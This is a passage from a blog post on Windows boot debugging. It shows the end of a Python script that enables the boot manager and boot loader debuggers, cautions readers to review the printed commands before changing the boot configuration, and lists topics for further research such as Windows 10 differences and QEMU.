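            subprocess.run(args, check=True)


if __name__ == "__main__":
    apply([
        bootdebug_command("{bootmgr}"),  # boot manager debugger
        bootdebug_command(),             # boot loader debugger, as shown above
    ])
```

Passing dry_run=False actually changes the boot configuration, so it is worth reviewing the printed commands first.<br />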
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0p8wMqTnaT7NHxEMmrEjhYsl3-0fu2PjwNCmDzrtuNFsSpeksikgGeU3_OTUBa2jMPWJHKZzsTi6nKPJhebMkdAN1QrPI7GJeUh3-65z-cPPdW6HEo64QxShWSqA0ngqPAvOJWn3Xch0/s1600/Screen+Shot+2014-11-02+at+5.11.08+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0p8wMqTnaT7NHxEMmrEjhYsl3-0fu2PjwNCmDzrtuNFsSpeksikgGeU3_OTUBa2jMPWJHKZzsTi6nKPJhebMkdAN1QrPI7GJeUh3-65z-cPPdW6HEo64QxShWSqA0ngqPAvOJWn3Xch0/s1600/Screen+Shot+2014-11-02+at+5.11.08+PM.png" height="454" width="640" /></a></div>
<h3>
Further Research</h3>
<div>
<ul>
<li>Differences in Windows 10.</li>
<li>When the processor switches to long mode on an x64 system.</li>
<li>QEMU may be a better choice in terms of installing OSes in it.</li>
</ul>
</div>
<div>
<br />
<br /></div>